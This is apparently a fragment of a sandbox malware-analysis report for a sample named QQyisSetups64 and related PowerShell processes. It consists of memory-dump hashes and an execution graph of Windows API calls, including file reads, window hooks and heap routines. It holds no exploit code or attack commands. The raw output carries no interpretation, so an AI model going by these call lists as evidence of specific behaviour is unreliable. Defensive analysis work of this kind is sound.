                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 036200A2
                                                                                                                                                                                                                        • Part of subcall function 0361381A: __getptd_noexit.LIBCMT ref: 0361381D
                                                                                                                                                                                                                        • Part of subcall function 0361381A: __amsg_exit.LIBCMT ref: 0361382A
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 036200B0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                      • API String ID: 803148776-1018135373
                                                                                                                                                                                                                      • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                                                                      • Instruction ID: 8934303b419f23c6b717fd539e396b683402a709ab8a2d28467331d4e5c1d6d0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81018F388047118EDF34DFA4C54466CBFB6AF04211F2D855ED4C19AB50CB3495A1CF00
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000C.00000002.1426666496.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_30c0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 38bbcc3562bf315115377dceb3d285beab08f3360c3cb54230f0f2ba918c955d
                                                                                                                                                                                                                      • Instruction ID: b5e25e1d0c865d6ba58ffcfbfbcbd02315df61277596f55f0b065ada044b6c3b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38bbcc3562bf315115377dceb3d285beab08f3360c3cb54230f0f2ba918c955d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C917E74A012458FCB15CF5CC494AAEFBB5FF48310B288699D815AB765C736FC91CBA0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000C.00000002.1426666496.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_30c0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 05e117922d67fbfc5a2452f0ba1b875b77c61e5e43d4c3fb86abea9e198a8df0
                                                                                                                                                                                                                      • Instruction ID: cf97b993baf45e8ad8c88e325744740a454800d17296c247aa29b71e033d80a7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 05e117922d67fbfc5a2452f0ba1b875b77c61e5e43d4c3fb86abea9e198a8df0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74415974A112498FCB19CF48C4D8AAEF7B5FF48310B2585A9D815AB764C736FC92CB90
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000C.00000002.1424194097.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_2e9d000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: de228ca72e559444e1d905330d1a5447720294ef01080cb7c5450c2329362a44
                                                                                                                                                                                                                      • Instruction ID: 3277b29637c67a3d4282c22624e6a1fcf570ba6ad068503cb783d9492f573060
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de228ca72e559444e1d905330d1a5447720294ef01080cb7c5450c2329362a44
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B901407104E3D09FD7128B258C94B52BFB4DF43228F19C1DBD8888F1A3C2695845C772
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000C.00000002.1424194097.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_2e9d000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a63f220690fd1a43978238283b7cf84110a49f42985289274baa4a032d721ebe
                                                                                                                                                                                                                      • Instruction ID: eae081580e26c7afb30ecabbfa851ad9d8bf43159e00612c379090f9d56a41dd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a63f220690fd1a43978238283b7cf84110a49f42985289274baa4a032d721ebe
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8001F2314483649AEB206A21CC84BA7FF98DF41229F08C11BEC484B282C3799846CAB2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000D.00000002.1402595113.000000000329D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0329D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_329d000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 17cd181615e1e9706e76674620aaf18f8b7a09b613cf45e474c5a83c56afd061
                                                                                                                                                                                                                      • Instruction ID: ed10eac1271d65c4494014c014abf1dc47ca49be8f857731542fc2c32f9a049a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17cd181615e1e9706e76674620aaf18f8b7a09b613cf45e474c5a83c56afd061
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B01F2315183049BFB208A25CC84B67FF9CDF41325F08C55BEC480B282C2799886DAB2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000D.00000002.1402595113.000000000329D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0329D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_329d000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: d6acb2045707e38cf57362c45cc332fb51202e606013c11953018503ca5d3cf3
                                                                                                                                                                                                                      • Instruction ID: 20a55a10f7626bf4737979ce99a006c1be59e27edf402c9d8aba741e81ffe9ee
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6acb2045707e38cf57362c45cc332fb51202e606013c11953018503ca5d3cf3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE01407204E3C09FE7128B258C94B52BFB8DF43224F1D81DBD8888F1A3C2699849D772

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:4.9%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                      Signature Coverage:1.1%
                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                      Total number of Limit Nodes:90
                                                                                                                                                                                                                      execution_graph 136135 6c6945e9 136136 6c6945f9 136135->136136 136137 6c6945f4 136135->136137 136141 6c6944f3 136136->136141 136149 6c6a4c6d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 136137->136149 136140 6c694607 136142 6c6944ff 136141->136142 136145 6c69454c 136142->136145 136147 6c69459c 136142->136147 136150 6c6943be 136142->136150 136144 6c69457c 136146 6c6943be __CRT_INIT@12 179 API calls 136144->136146 136144->136147 136145->136144 136145->136147 136148 6c6943be __CRT_INIT@12 179 API calls 136145->136148 136146->136147 136147->136140 136148->136144 136149->136136 136151 6c694449 136150->136151 136152 6c6943cd 136150->136152 136153 6c694480 136151->136153 136157 6c69444f 136151->136157 136195 6c698189 HeapCreate 136152->136195 136155 6c694485 136153->136155 136158 6c6944de 136153->136158 136209 6c69abe0 8 API calls __decode_pointer 136155->136209 136160 6c69446a 136157->136160 136167 6c6943d8 136157->136167 136206 6c690ac7 52 API calls _doexit 136157->136206 136158->136167 136212 6c69af17 67 API calls 2 library calls 136158->136212 136160->136167 136207 6c6a3adf DeleteCriticalSection 136160->136207 136161 6c6943df 136197 6c69af87 62 API calls 7 library calls 136161->136197 136163 6c69448a __calloc_crt 136163->136167 136168 6c6944a2 136163->136168 136167->136145 136210 6c69ab45 6 API calls __crt_waiting_on_module_handle 136168->136210 136169 6c6943e4 __RTC_Initialize 136170 6c6943e8 136169->136170 136176 6c6943f4 GetCommandLineA 136169->136176 136198 6c6981b9 VirtualFree HeapFree HeapFree HeapDestroy 136170->136198 136171 6c694474 136208 6c69ac31 7 API calls __decode_pointer 136171->136208 136175 6c6944b4 136180 6c6943ed 136175->136180 136211 6c69ac6e 52 API calls 4 library calls 136175->136211 136199 6c6a4b36 11 API calls ___crtGetEnvironmentStringsA 136176->136199 136180->136167 136181 6c694404 136200 6c6a388b 8 API calls __mtinitlocknum 136181->136200 136184 6c6944c2 GetCurrentThreadId 136184->136167 136185 6c69440e 136186 6c694412 136185->136186 136202 6c6a4a7b 109 API calls 2 library calls 136185->136202 136201 6c69ac31 7 API calls __decode_pointer 136186->136201 136189 6c69441e 136190 6c694432 136189->136190 136203 6c6a4803 108 API calls 4 library calls 136189->136203 136190->136180 136205 6c6a3adf DeleteCriticalSection 136190->136205 136193 6c694427 136193->136190 136204 6c6908ea 69 API calls 5 library calls 136193->136204 136196 6c6943d3 136195->136196 136196->136161 136196->136167 136197->136169 136198->136180 136199->136181 136200->136185 136202->136189 136203->136193 136204->136190 136205->136186 136206->136160 136207->136171 136209->136163 136210->136175 136211->136184 136212->136167 136213 a93ca8 136216 af8c13 136213->136216 136215 a93cc3 136217 af8c1f _realloc 136216->136217 136218 af8c27 136217->136218 136219 af8c42 136217->136219 136313 af98e4 67 API calls __getptd_noexit 136218->136313 136220 af8c50 136219->136220 136226 af8c91 136219->136226 136315 af98e4 67 API calls __getptd_noexit 136220->136315 136222 af8c2c 136314 af98d1 67 API calls __getptd_noexit 136222->136314 136225 af8c55 136316 af98d1 67 API calls __getptd_noexit 136225->136316 136227 af8c9e 136226->136227 136228 af8cb2 136226->136228 136318 af98e4 67 API calls __getptd_noexit 136227->136318 136234 af8cdb 136228->136234 136235 af8cc5 136228->136235 136231 af8c5c 136317 afa5b1 6 API calls 2 library calls 136231->136317 136232 af8ca3 136319 af98d1 67 API calls __getptd_noexit 136232->136319 136320 af98d1 67 API calls __getptd_noexit 136234->136320 136244 af8651 136235->136244 136237 af8c34 _realloc 136237->136215 136240 af8cd3 136322 af8d06 LeaveCriticalSection __unlock_fhandle 136240->136322 136241 af8ce0 136321 af98e4 67 API calls __getptd_noexit 136241->136321 136245 af866d 136244->136245 136246 af8688 136244->136246 136323 af98e4 67 API calls __getptd_noexit 136245->136323 136247 af8697 136246->136247 136249 af86be 136246->136249 136325 af98e4 67 API calls __getptd_noexit 136247->136325 136253 af86dd 136249->136253 136264 af86f1 136249->136264 136251 af8672 136324 af98d1 67 API calls __getptd_noexit 136251->136324 136252 af869c 136326 af98d1 67 API calls __getptd_noexit 136252->136326 136328 af98e4 67 API calls __getptd_noexit 136253->136328 136255 af8749 136330 af98e4 67 API calls __getptd_noexit 136255->136330 136258 af86a3 136327 afa5b1 6 API calls 2 library calls 136258->136327 136260 af86e2 136329 af98d1 67 API calls __getptd_noexit 136260->136329 136262 af874e 136331 af98d1 67 API calls __getptd_noexit 136262->136331 136264->136255 136265 af867a 136264->136265 136268 af8725 136264->136268 136270 af876a 136264->136270 136265->136240 136267 af86e9 136332 afa5b1 6 API calls 2 library calls 136267->136332 136268->136255 136273 af8730 ReadFile 136268->136273 136333 b00596 136270->136333 136275 af885c 136273->136275 136276 af8bd7 GetLastError 136273->136276 136275->136276 136283 af8870 136275->136283 136277 af8a5d 136276->136277 136278 af8be4 136276->136278 136292 af89e2 136277->136292 136345 af98f7 67 API calls 2 library calls 136277->136345 136360 af98d1 67 API calls __getptd_noexit 136278->136360 136279 af8788 136339 af98d1 67 API calls __getptd_noexit 136279->136339 136280 af87a6 136341 b0f555 69 API calls 3 library calls 136280->136341 136283->136292 136293 af888c 136283->136293 136295 af8aa2 136283->136295 136285 af8be9 136361 af98e4 67 API calls __getptd_noexit 136285->136361 136286 af878d 136340 af98e4 67 API calls __getptd_noexit 136286->136340 136288 af87b2 136288->136273 136292->136265 136346 af49fc 136292->136346 136294 af88f2 ReadFile 136293->136294 136301 af896f 136293->136301 136299 af8910 GetLastError 136294->136299 136304 af891a 136294->136304 136295->136292 136296 af8b1a ReadFile 136295->136296 136297 af8b39 GetLastError 136296->136297 136305 af8b43 136296->136305 136297->136295 136297->136305 136298 af8a33 MultiByteToWideChar 136298->136292 136300 af8a57 GetLastError 136298->136300 136299->136293 136299->136304 136300->136277 136301->136292 136302 af89dd 136301->136302 136303 af89ea 136301->136303 136309 af89a7 136301->136309 136343 af98d1 67 API calls __getptd_noexit 136302->136343 136303->136309 136310 af8a21 136303->136310 136304->136293 136342 b0f555 69 API calls 3 library calls 136304->136342 136305->136295 136359 b0f555 69 API calls 3 library calls 136305->136359 136309->136298 136344 b0f555 69 API calls 3 library calls 136310->136344 136312 af8a30 136312->136298 136313->136222 136314->136237 136315->136225 136316->136231 136318->136232 136319->136231 136320->136241 136321->136240 136322->136237 136323->136251 136324->136265 136325->136252 136326->136258 136328->136260 136329->136267 136330->136262 136331->136267 136336 b0059f 136333->136336 136335 af8780 136335->136279 136335->136280 136336->136335 136337 b005b6 Sleep 136336->136337 136362 af5674 136336->136362 136338 b005cb 136337->136338 136338->136335 136338->136336 136339->136286 136340->136265 136341->136288 136342->136304 136343->136292 136344->136312 136345->136292 136348 af4a08 _realloc 136346->136348 136347 af4a47 136349 af4a81 _realloc 136347->136349 136350 af4a5c RtlFreeHeap 136347->136350 136348->136347 136348->136349 136389 b0339f 136348->136389 136349->136265 136350->136349 136352 af4a6e 136350->136352 136398 af98d1 67 API calls __getptd_noexit 136352->136398 136354 af4a73 GetLastError 136354->136349 136355 af4a1f ___sbh_find_block 136358 af4a39 136355->136358 136396 b034fd __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 136355->136396 136397 af4a52 LeaveCriticalSection _doexit 136358->136397 136359->136305 136360->136285 136361->136292 136363 af5727 136362->136363 136373 af5686 136362->136373 136387 b05437 6 API calls __decode_pointer 136363->136387 136365 af572d 136388 af98d1 67 API calls __getptd_noexit 136365->136388 136370 af56e3 RtlAllocateHeap 136370->136373 136371 af5697 136371->136373 136380 b05630 67 API calls 2 library calls 136371->136380 136381 b0545f 67 API calls 7 library calls 136371->136381 136382 af70a5 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 136371->136382 136373->136370 136373->136371 136374 af5713 136373->136374 136377 af5718 136373->136377 136379 af571f 136373->136379 136383 af55ab 67 API calls 4 library calls 136373->136383 136384 b05437 6 API calls __decode_pointer 136373->136384 136385 af98d1 67 API calls __getptd_noexit 136374->136385 136386 af98d1 67 API calls __getptd_noexit 136377->136386 136379->136336 136380->136371 136381->136371 136383->136373 136384->136373 136385->136377 136386->136379 136387->136365 136388->136379 136390 b033b4 136389->136390 136391 b033c7 EnterCriticalSection 136389->136391 136399 b032dc 67 API calls 7 library calls 136390->136399 136391->136355 136393 b033ba 136393->136391 136400 af7051 67 API calls 3 library calls 136393->136400 136395 b033c6 136395->136391 136396->136358 136397->136347 136398->136354 136399->136393 136400->136395 136401 ac566f 136408 a896d7 136401->136408 136406 ac56b7 136409 a896e8 EnterCriticalSection 136408->136409 136410 a896e4 136408->136410 136411 a89704 GetCurrentThreadId 136409->136411 136413 a8970c 136409->136413 136410->136406 136414 a877af 136410->136414 136411->136413 136422 a883c2 136413->136422 136415 a877c2 136414->136415 136416 a877b7 136414->136416 136426 a87774 GetCurrentProcess FlushInstructionCache 136415->136426 136425 aefcad 16 API calls 136416->136425 136419 a877bc 136419->136415 136420 a877d1 SetWindowLongW 136419->136420 136421 ab5e24 CallWindowProcW 136420->136421 136421->136406 136423 a883cb LeaveCriticalSection 136422->136423 136424 a883d7 136422->136424 136423->136424 136424->136410 136425->136419 136426->136420 136427 a963aa 136428 a963b6 __EH_prolog3_catch 136427->136428 136431 a95ab7 136428->136431 136568 af4d50 136431->136568 136434 a95b22 136435 a95b3a GetCurrentDirectoryW 136434->136435 136436 a95b63 _wcscat _wcscpy 136435->136436 136570 a94494 8 API calls 3 library calls 136436->136570 136438 a95bdd 136571 a948f2 GetCurrentThreadId RaiseException __EH_prolog3 std::_Locinfo::~_Locinfo 136438->136571 136440 a95bec 136572 a94c96 GetCurrentThreadId RaiseException __EH_prolog3 std::_Locinfo::~_Locinfo 136440->136572 136442 a95bfb 136573 a94d5b GetCurrentThreadId RaiseException __EH_prolog3 std::_Locinfo::~_Locinfo 136442->136573 136444 a95c07 _strlen 136574 a93210 7 API calls __CxxThrowException@8 136444->136574 136446 a95c24 _strlen 136575 a92982 136446->136575 136448 a95c38 136580 a91e26 136448->136580 136569 a95ac9 GetWindowsDirectoryW 136568->136569 136569->136434 136570->136438 136571->136440 136572->136442 136573->136444 136574->136446 136665 a92765 136575->136665 136577 a929c7 136577->136448 136578 a92996 136578->136577 136671 af4656 RaiseException 136578->136671 136581 a91e3b _wcslen 136580->136581 136666 a9278f 136665->136666 136670 a92788 136665->136670 136680 a8e676 __VEC_memcpy ___sbh_free_block 136666->136680 136669 a92860 136669->136578 136672 af4647 136670->136672 136671->136577 136673 af464f 136672->136673 136674 af4651 IsDebuggerPresent 136672->136674 136673->136669 136681 b11582 136674->136681 136677 b02a83 SetUnhandledExceptionFilter UnhandledExceptionFilter 136678 b02aa0 __invoke_watson 136677->136678 136679 b02aa8 GetCurrentProcess TerminateProcess 136677->136679 136678->136679 136679->136669 136680->136670 136681->136677 136953 6c5ed558 136954 6c5ed562 136953->136954 136955 6c5ed563 136953->136955 136956 6c5ed56f 136955->136956 136957 6c5ed573 FindNextFileW 136955->136957 136958 acd92b ShowWindow 136959 acd94d ShowWindow 136958->136959 136961 acd978 136959->136961 136962 acd964 136959->136962 136963 acd980 ShowWindow ShowWindow ShowWindow ShowWindow 136961->136963 136964 acd9a7 ShowWindow ShowWindow ShowWindow ShowWindow 136961->136964 136962->136963 136968 ac1610 EnableWindow InvalidateRect RedrawWindow 136962->136968 136966 acd9cc ShowWindow 136963->136966 136964->136966 136967 acd9dc 136966->136967 136968->136961 136969 aceb24 136974 ace85c 136969->136974 136972 aceb3d MoveWindow 136973 aceb5f 136972->136973 136975 a877af 18 API calls 136974->136975 136976 ace86b 136975->136976 136977 ace86f SetLastError 136976->136977 136978 ace87b 136976->136978 136980 ace8a8 136977->136980 136982 a89677 136978->136982 136980->136972 136980->136973 136983 a89687 RaiseException 136982->136983 136984 a89696 136982->136984 136983->136984 136984->136983 136985 a896a4 GetCurrentThreadId EnterCriticalSection 136984->136985 136986 a883c2 LeaveCriticalSection 136985->136986 136987 a896d1 CreateDialogParamW 136986->136987 136987->136980 136988 a9553b 136989 a9554c 136988->136989 136990 a91e26 RaiseException 136989->136990 136991 a955f1 136990->136991 136992 a91e26 RaiseException 136991->136992 136993 a95604 136992->136993 136994 a94994 101 API calls 136993->136994 136995 a9561b ctype 136994->136995 136996 a95648 136995->136996 137008 a9269d 80 API calls 3 library calls 136995->137008 137002 a93c23 136996->137002 136999 a9565f 137000 af4647 _strlwr_s_l_stat 5 API calls 136999->137000 137001 a9567c 137000->137001 137003 a93c2f __EH_prolog3 137002->137003 137004 a92969 3 API calls 137003->137004 137005 a93c46 137004->137005 137006 a93c50 FreeLibrary 137005->137006 137007 a93c57 ctype std::_Locinfo::~_Locinfo 137005->137007 137006->137007 137007->136999 137008->136996 137009 6c601c33 137019 6c68e86c 137009->137019 137011 6c601c57 GdiplusStartup 137014 6c601c80 137011->137014 137012 6c601c8a 137013 6c601cb4 _memset GetCurrentDirectoryW 137015 6c601ce0 137013->137015 137014->137012 137014->137013 137020 6c64c080 137015->137020 137017 6c601d02 137017->137012 137018 6c601d0a GetCurrentThreadId SetWindowsHookExW 137017->137018 137018->137012 137019->137011 137021 6c64c0a4 __EH_prolog3 137020->137021 137049 6c5dc2cf 137021->137049 137027 6c64c0d4 137028 6c64c1c2 137027->137028 137029 6c64c0eb _memset SHGetValueW 137027->137029 137068 6c5d894f 137028->137068 137029->137028 137031 6c64c135 137029->137031 137033 6c5dc2cf 7 API calls 137031->137033 137032 6c64c1ca 137032->137017 137034 6c64c140 137033->137034 137035 6c6266b1 4 API calls 137034->137035 137036 6c64c14d 137035->137036 137037 6c6266b1 4 API calls 137036->137037 137038 6c64c159 137037->137038 137071 6c5da251 9 API calls ctype 137038->137071 137040 6c64c167 PathFileExistsW 137041 6c64c176 137040->137041 137042 6c64c1ba 137040->137042 137050 6c5dc2e2 137049->137050 137055 6c5dc2f5 137049->137055 137051 6c5dc2ec 137050->137051 137052 6c5dc2f7 lstrlenW 137050->137052 137073 6c5db059 6 API calls ctype 137051->137073 137054 6c5dc305 137052->137054 137052->137055 137054->137055 137074 6c5d7783 __CxxThrowException _memcpy_s ctype 137054->137074 137057 6c5d92da 137055->137057 137058 6c5d9312 CharLowerW 137057->137058 137059 6c5d92e6 137057->137059 137063 6c6266b1 137058->137063 137075 6c5d8ad1 137059->137075 137061 6c5d92eb 137061->137058 137078 6c5d7783 __CxxThrowException _memcpy_s ctype 137061->137078 137064 6c6266c1 lstrlenW 137063->137064 137065 6c6266bd 137063->137065 137064->137065 137079 6c5d8a5b 137065->137079 137069 6c5d895f InterlockedDecrement 137068->137069 137070 6c5d896d 137068->137070 137069->137070 137070->137032 137071->137040 137073->137055 137074->137055 137076 6c5d8ae1 InterlockedDecrement 137075->137076 137077 6c5d8aef 137075->137077 137076->137077 137077->137061 137078->137058 137080 6c5d8a69 137079->137080 137081 6c5d8a99 137079->137081 137082 6c5d8aae 137080->137082 137084 6c5d8a84 137080->137084 137081->137027 137089 6c5d89e5 __CxxThrowException _memcpy_s ctype 137082->137089 137088 6c5d7783 __CxxThrowException _memcpy_s ctype 137084->137088 137086 6c5d8ac0 137086->137081 137090 6c5d7f0d InterlockedDecrement 137086->137090 137088->137081 137089->137086 137090->137081 137091 aa76fe 137092 aa770c 137091->137092 137093 aa7797 137092->137093 137100 aa7736 SetWindowPos 137092->137100 137117 aa6180 GetWindowLongW 137093->137117 137097 aa77c9 GetDlgItem 137135 aa6c96 137097->137135 137148 a9e185 GetDC 137100->137148 137104 aa7755 137149 af5546 137104->137149 137107 aa7846 GetDlgItem 137109 aa6c96 19 API calls 137107->137109 137111 aa785f 137109->137111 137110 aa7781 137164 a9e1a1 ReleaseDC DeleteDC 137110->137164 137113 ac134f 14 API calls 137111->137113 137114 aa7876 GetClientRect SetWindowPos 137113->137114 137116 aa78b1 std::_Locinfo::~_Locinfo 137114->137116 137118 aa61c1 GetWindowRect 137117->137118 137119 aa61a4 137117->137119 137120 aa624a GetParent GetClientRect GetClientRect MapWindowPoints 137118->137120 137121 aa61d6 137118->137121 137122 aa61ab GetParent 137119->137122 137123 aa61b5 GetWindow 137119->137123 137130 aa6231 SetWindowPos 137120->137130 137124 aa61da GetWindowLongW 137121->137124 137125 aa61e6 MonitorFromWindow 137121->137125 137126 aa61bf 137122->137126 137123->137126 137124->137125 137128 aa620d GetMonitorInfoW 137125->137128 137129 aa6206 GetClientRect 137125->137129 137126->137118 137128->137129 137131 aa6223 137128->137131 137134 ab6576 137129->137134 137130->137129 137131->137130 137133 aa623d GetWindowRect 137131->137133 137133->137130 137134->137097 137136 aa6c9f 137135->137136 137137 a877af 18 API calls 137136->137137 137138 aa6cab 137137->137138 137139 aa6caf 137138->137139 137140 aa6cb3 SetWindowLongW 137138->137140 137141 ac134f 137139->137141 137140->137139 137142 aa77f9 GetClientRect SetWindowPos 137141->137142 137143 ac1361 137141->137143 137147 ab6576 137142->137147 137165 ada3ab 137143->137165 137145 ac1375 137145->137142 137146 ac1395 SetWindowPos 137145->137146 137146->137142 137147->137107 137148->137104 137152 af5550 137149->137152 137150 af5674 _malloc 67 API calls 137150->137152 137151 aa776e 137151->137110 137161 aa7323 CreateCompatibleDC 137151->137161 137152->137150 137152->137151 137156 af556c std::bad_alloc::bad_alloc 137152->137156 137193 b05437 6 API calls __decode_pointer 137152->137193 137155 af559c 137196 af4656 RaiseException 137155->137196 137159 af5592 137156->137159 137194 af4f89 74 API calls _AtModuleExit 137156->137194 137195 a7d330 67 API calls std::exception::exception 137159->137195 137160 af55aa 137197 aa6393 CreateCompatibleBitmap 137161->137197 137163 aa736a SelectObject SetViewportOrgEx 137163->137110 137164->137093 137170 ada21d 137165->137170 137168 ada3ca 137168->137145 137171 ada25b 137170->137171 137172 ada227 137170->137172 137171->137168 137177 ada2d7 FindResourceW 137171->137177 137173 ada22e DeleteObject 137172->137173 137174 ada237 137172->137174 137176 ada242 DeleteFileW 137173->137176 137175 ada23c 137174->137175 137174->137176 137175->137176 137176->137171 137178 ada2fc SizeofResource 137177->137178 137190 ada2f5 137177->137190 137179 ada30d LoadResource LockResource 137178->137179 137178->137190 137180 ada325 GlobalAlloc 137179->137180 137179->137190 137181 ada336 GlobalLock 137180->137181 137182 ada333 137180->137182 137183 ada341 GlobalUnlock 137181->137183 137184 ada353 _realloc 137181->137184 137185 ada349 GlobalFree 137182->137185 137183->137185 137186 ada35d GlobalUnlock 137184->137186 137185->137190 137192 a9846c 137186->137192 137188 ada374 CreateStreamOnHGlobal 137190->137168 137192->137188 137193->137152 137194->137159 137195->137155 137196->137160 137197->137163 137198 6c64b931 137199 6c64b938 137198->137199 137200 6c64b958 137199->137200 137201 6c64b93e PathFileExistsW 137199->137201 137201->137200 137202 6c64b94d PathIsDirectoryW 137201->137202 137202->137200 137203 af6979 137204 af6985 _realloc 137203->137204 137205 af69af 137204->137205 137206 af6990 137204->137206 137239 b04e30 137205->137239 137290 af98d1 67 API calls __getptd_noexit 137206->137290 137209 af6995 137291 afa5b1 6 API calls 2 library calls 137209->137291 137213 af69be 137259 b005db 137213->137259 137216 af69a5 _realloc _setlocale 137217 b0339f __lock 67 API calls 137218 af69e7 137217->137218 137265 af5abd 137218->137265 137298 b04db7 GetLastError 137239->137298 137241 b04e38 137243 af69b4 137241->137243 137313 af7051 67 API calls 3 library calls 137241->137313 137244 af5b21 137243->137244 137245 af5b2d _realloc 137244->137245 137246 b04e30 __getptd 67 API calls 137245->137246 137247 af5b32 137246->137247 137248 af5b60 137247->137248 137250 af5b44 137247->137250 137249 b0339f __lock 67 API calls 137248->137249 137251 af5b67 137249->137251 137252 b04e30 __getptd 67 API calls 137250->137252 137363 af5ae3 75 API calls 3 library calls 137251->137363 137255 af5b49 137252->137255 137254 af5b7a 137364 af5b8b LeaveCriticalSection _doexit 137254->137364 137257 af5b57 _realloc 137255->137257 137362 af7051 67 API calls 3 library calls 137255->137362 137257->137213 137262 b005e4 137259->137262 137261 af69d1 137261->137216 137261->137217 137262->137261 137263 b00602 Sleep 137262->137263 137365 b113b0 137262->137365 137264 b00617 137263->137264 137264->137261 137264->137262 137266 af5ac6 137265->137266 137267 af5adf 137265->137267 137266->137267 137268 af5995 ___addlocaleref 8 API calls 137266->137268 137269 af6aa7 137267->137269 137268->137267 137383 b032ad LeaveCriticalSection 137269->137383 137271 af6a01 137290->137209 137314 b04c42 TlsGetValue 137298->137314 137301 b04e24 SetLastError 137301->137241 137302 b005db __calloc_crt 64 API calls 137303 b04de2 137302->137303 137303->137301 137304 b04dea 137303->137304 137319 b04ba7 6 API calls __crt_waiting_on_module_handle 137304->137319 137306 b04dfc 137307 b04e03 137306->137307 137308 b04e1b 137306->137308 137320 b04cd0 137307->137320 137310 af49fc _realloc 64 API calls 137308->137310 137312 b04e21 137310->137312 137312->137301 137313->137243 137315 b04c72 137314->137315 137316 b04c57 137314->137316 137315->137301 137315->137302 137339 b04ba7 6 API calls __crt_waiting_on_module_handle 137316->137339 137318 b04c62 TlsSetValue 137318->137315 137319->137306 137340 af47dc 137320->137340 137322 b04cdc GetModuleHandleW 137323 b04cf3 137322->137323 137324 b04cec 137322->137324 137326 b04d0a GetProcAddress GetProcAddress 137323->137326 137327 b04d2e 137323->137327 137341 af7021 Sleep GetModuleHandleW 137324->137341 137326->137327 137329 b0339f __lock 63 API calls 137327->137329 137328 b04cf2 137328->137323 137330 b04d4d InterlockedIncrement 137329->137330 137342 b04da5 137330->137342 137333 b0339f __lock 63 API calls 137334 b04d6e 137333->137334 137345 af5995 InterlockedIncrement 137334->137345 137339->137318 